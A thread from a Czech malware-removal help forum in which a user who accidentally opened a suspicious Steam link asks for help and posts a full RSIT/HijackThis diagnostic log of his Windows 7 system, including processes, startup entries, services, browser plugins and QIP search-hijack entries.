Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz

Malware - prosim o kontrolu logu

Máte problém s virem? Vložte sem log z FRST nebo RSIT.

Moderátor: Moderátoři

Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]

Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.

!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Zamčeno
Zpráva
Autor
chvostik
Návštěvník
Návštěvník
Příspěvky: 31
Registrován: 04 dub 2008 17:37

Malware - prosim o kontrolu logu

#1 Příspěvek od chvostik »

Ahoj,
neznámý typek mi na steamu poslal odkaz na pochybnou stránku, kterou jsem zkopíroval a chtěl vygooglit (prakticky jsem věděl že jde o malware), ale omylem jsem ji zadal do url adresy a otevřelo se mi error 404 a ruská hláška. Mám celkem strach jestli se mi něco nestáhlo do kompu..nainstaloval jsem hned ZoneAlarm a Anti-Malware + aktivně běžel original NOD (ovšem bez platné licence takže neaktuální), ale fakt nevim jestli to pomohlo ..nechci přijít o hesla a kreditku :-). Předem díky za pomoc, níže je můj log


nLogfile of random's system information tool 1.10 (written by random/random)
Run by Lobo at 2014-12-09 16:36:55
Microsoft Windows 7 Ultimate
System drive C: has 9 GB (16%) free of 57 GB
Total RAM: 4094 MB (37% free)

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 16:37:03, on 9.12.2014
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16385)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\Program Files (x86)\Google\Drive\googledrivesync.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe
C:\Program Files (x86)\Google\Drive\googledrivesync.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
D:\Steam\Steam.exe
D:\Steam\bin\steamwebhelper.exe
D:\Steam\bin\steamwebhelper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
C:\Program Files (x86)\Java\jre7\bin\javaw.exe
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe
C:\Program Files\trend micro\Lobo.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://qip.ru
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.qip.ru
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.qip.ru/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://search.qip.ru
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.zonealarm.com/?src=hp&tbi ... tsId=&ver=&
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.qip.ru/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: QIPBHO Class - {95289393-33EA-4F8D-B952-483415B9C955} - C:\Users\Lobo\AppData\Roaming\Microsoft\Internet Explorer\qipsearchbar.dll
R3 - URLSearchHook: (no name) - - (no file)
F2 - REG:system.ini: UserInit=userinit.exe,
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
O2 - BHO: QIPBHO - {95289393-33EA-4F8D-B952-483415B9C955} - C:\Users\Lobo\AppData\Roaming\Microsoft\Internet Explorer\qipsearchbar.dll
O2 - BHO: (no name) - {95B7759C-8C7F-4BF1-B163-73684A933233} - (no file)
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [ZoneAlarm] "C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe"
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [GoogleDriveSync] "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-21-2861910011-920187971-3878467655-1001\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'UpdatusUser')
O4 - HKUS\S-1-5-21-2861910011-920187971-3878467655-1001\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'UpdatusUser')
O4 - Global Startup: vpngui.exe.lnk = ?
O8 - Extra context menu item: Download with GetRight - C:\Program Files (x86)\GetRight\GRdownload.htm
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Office Excel - res://C:\PROGRA~2\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files (x86)\GetRight\GRbrowse.htm
O9 - Extra button: Zdroje informací - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~1\OFFICE11\REFIEBAR.DLL
O23 - Service: ArchestrA Logger (aaLogger) - Invensys Systems, Inc. - C:\Program Files (x86)\Common Files\ArchestrA\aaLogger.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Cisco Systems, Inc. VPN Service (CVPND) - Cisco Systems, Inc. - C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe
O23 - Service: COMODO Dragon Update Service (DragonUpdater) - Comodo Security Solutions, Inc. - C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: ESET Service (ekrn) - ESET - C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe
O23 - Service: ES lite Service for program management. (ES lite Service) - Unknown owner - C:\Program Files (x86)\Gigabyte\EasySaver\ESSVR.EXE
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FS Service Control - Wonderware Corporation - C:\Program Files (x86)\Common Files\ArchestrA\NTServApp.exe
O23 - Service: Služba Google Update (gupdate) (gupdate) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (file missing)
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (file missing)
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: MBAMScheduler - Malwarebytes Corporation - C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NMSAccess - Unknown owner - C:\Program Files (x86)\Blaze Media Pro\NMSAccess32.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: NVIDIA Update Service Daemon (nvUpdatusService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
O23 - Service: PDF Architect Helper Service - pdfforge GmbH - C:\Program Files (x86)\PDF Architect\HelperService.exe
O23 - Service: PDF Architect Service - pdfforge GmbH - C:\Program Files (x86)\PDF Architect\ConversionService.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: Wonderware SuiteLink (slssvc) - Invensys Systems, Inc. - C:\Program Files (x86)\Common Files\ArchestrA\slssvc.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: TeamViewer 9 (TeamViewer9) - TeamViewer GmbH - C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: TrueVector Internet Monitor (vsmon) - Check Point Software Technologies Ltd. - C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
O23 - Service: Wonderware NetDDE Helper (WWNetDDE) - Invensys Systems, Inc. - C:\Program Files (x86)\Common Files\ArchestrA\wwnetdde.exe
O23 - Service: ZoneAlarm Privacy Service (ZAPrivacyService) - Check Point Software Technologies, Ltd. - C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZaPrivacyService.exe

--
End of file - 11454 bytes

======Listing Processes======



\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
winlogon.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
"C:\Windows\system32\nvvsvc.exe"
"C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe"
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
"C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe"
C:\Windows\system32\nvvsvc.exe -session -first
C:\Windows\system32\svchost.exe -k NetworkService
"C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe" -service
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\Common Files\ArchestrA\aaLogger.exe"
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
"C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe"
"C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe"
"C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe"
"C:\Program Files (x86)\Gigabyte\EasySaver\ESSVR.EXE"
"C:\Program Files (x86)\Common Files\ArchestrA\NTServApp.exe"
"C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe"
"C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe"
"C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
"C:\Program Files (x86)\Blaze Media Pro\NMSAccess32.exe"
"C:\Program Files (x86)\PDF Architect\HelperService.exe"
"C:\Program Files (x86)\PDF Architect\ConversionService.exe"
"C:\Program Files (x86)\Common Files\ArchestrA\slssvc.exe"
"C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe"
C:\Windows\system32\svchost.exe -k imgsvc
"C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe"
"C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZaPrivacyService.exe"
"taskhost.exe"
"C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe" /starttray
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
"C:\Program Files\ESET\ESET Smart Security\egui.exe" /hide /waitservice
"C:\Program Files\Windows Sidebar\sidebar.exe" /autoRun
"C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart
"C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe"
"C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
"C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe"
"C:/Program Files/NVIDIA Corporation/Display/nvtray.exe" -user_has_logged_in 1
"C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart
C:\Windows\system32\SearchIndexer.exe /Embedding
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
"C:\Program Files (x86)\Mozilla Firefox\firefox.exe"
"C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe"
C:\Windows\system32\sppsvc.exe
"D:\Steam\Steam.exe"
"D:\Steam\bin\steamwebhelper.exe" -cefhost -cachedir "D:\Steam\config\htmlcache" -cookiepath "D:\Steam\config\cookies" -steampid 4776 --blacklist-accelerated-compositing --process-per-tab --disable-accelerated-video-decode --enable-direct-write
"D:\Steam\bin\steamwebhelper.exe" --type=renderer --disable-accelerated-video-decode --disable-delegated-renderer --disable-gpu-compositing --disable-threaded-compositing --enable-pinch --enable-software-compositing --no-sandbox --enable-direct-write --lang=en-US --lang=en-US --product-version="Valve Steam Client" --disable-accelerated-compositing --disable-gpu-compositing --channel="4172.0.1699133600\708524630" /prefetch:673131151
"C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe" -auto -critical
"C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe" -classpath "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar" "-Djava.security.policy=file:C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy" -DtrustProxy=true -Xverify:remote "-Djnlpx.home=C:\\Program Files (x86)\\Java\\jre7\\bin" -Dsun.awt.warmup=true "-Xbootclasspath/a:C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar;C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy.jar;C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar" "-Djnlpx.jvm=C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe" com.sun.javaws.Main -SSVBaselineUpdate -notWebJava

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
"C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe" --channel=5036.159c6fa0.1252309367 "C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll" -greomni "C:\Program Files (x86)\Mozilla Firefox\omni.ja" -appomni "C:\Program Files (x86)\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files (x86)\Mozilla Firefox\browser" E7CF176E110C211B 5036 "\\.\pipe\gecko-crash-server-pipe.5036" plugin
"C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe" --proxy-stub-channel=Flash1100.65F3E980.14185 --host-broker-channel=Flash1100.65F3E980.30457 --host-pid=1100 --host-npapi-version=27 --plugin-path="C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll"
"C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe" --channel=1184.002EF600.273235110 --proxy-stub-channel=Flash1100.65F3E980.14185 --plugin-path="C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll" --host-npapi-version=27 --type=renderer
"D:\Stažené soubory\RSITx64.exe"
C:\Windows\system32\wbem\wmiprvse.exe

======Scheduled tasks folder======

C:\Windows\tasks\Adobe Flash Player Updater.job - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
C:\Windows\tasks\GoogleUpdateTaskMachineCore1cf8c5b584a0b82.job - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
C:\Windows\tasks\GoogleUpdateTaskMachineUA1cf6ab1eb08fd0f.job - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler

=========Mozilla firefox=========

ProfilePath - C:\Users\Lobo\AppData\Roaming\Mozilla\Firefox\Profiles\fa980s6u.default

prefs.js - "browser.startup.homepage" - "seznam.cz"
prefs.js - "keyword.URL" - ""

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 15.0.0.239 Plugin
"Path"=C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/ShockwavePlayer]
"Description"=Adobe Shockwave Player
"Path"=C:\Windows\SysWOW64\Adobe\Director\np32dsw_1209149.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@java.com/DTPlugin,version=10.45.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=C:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@nvidia.com/3DVision]
"Description"=NVIDIA stereo images plugin for Mozilla browsers
"Path"=C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@nvidia.com/3DVisionStreaming]
"Description"=NVIDIA 3D Vision Streaming plugin for Mozilla browsers
"Path"=C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@pandonetworks.com/PandoWebPlugin]
"Description"=This plugin detects and launches Pando Media Booster
"Path"=C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll


[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 15.0.0.239 Plugin
"Path"=C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_239.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=C:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll


C:\Users\Lobo\AppData\Roaming\Mozilla\Firefox\Profiles\fa980s6u.default\searchplugins\
qip-search.xml

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-10-08 462760]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95289393-33EA-4F8D-B952-483415B9C955}]
QIPBHO Class - C:\Users\Lobo\AppData\Roaming\Microsoft\Internet Explorer\qipsearchbar.dll [2012-11-26 143472]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2013-10-08 171944]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"=C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2010-04-06 10144288]
"egui"=C:\Program Files\ESET\ESET Smart Security\egui.exe [2013-03-21 6330568]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"=C:\Program Files\Windows Sidebar\sidebar.exe [2009-07-14 1475072]
"DAEMON Tools Lite"=C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [2013-03-14 3672640]
"GoogleDriveSync"=C:\Program Files (x86)\Google\Drive\googledrivesync.exe [2014-08-08 22734160]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"HP Software Update"=C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [2010-06-09 49208]
""= []
"Adobe ARM"=C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-08-21 959176]
"SunJavaUpdateSched"=C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2013-07-02 254336]
"APSDaemon"=C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [2013-04-21 59720]
"ZoneAlarm"=C:\Program Files (x86)\CheckPoint\ZoneAlarm\zatray.exe [2014-08-13 137352]

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
vpngui.exe.lnk - C:\Windows\Installer\{5FDC06BF-3D3D-4367-8FFB-4FAFCB61972D}\Icon09DB8A851.exe

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\vsmon]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableLockWorkstation"=0
"DisableChangePassword"=0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=0
"ConsentPromptBehaviorUser"=3
"EnableLUA"=0
"EnableUIADesktopToggle"=0
"PromptOnSecureDesktop"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoLogoff"=0
"NoClose"=0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoActiveDesktop"=1
"NoActiveDesktopChanges"=1
"ForceActiveDesktopOn"=0

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvyu"=msyuv.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"vidc.yvu9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"wave"=wdmaud.drv
"midi"=wdmaud.drv
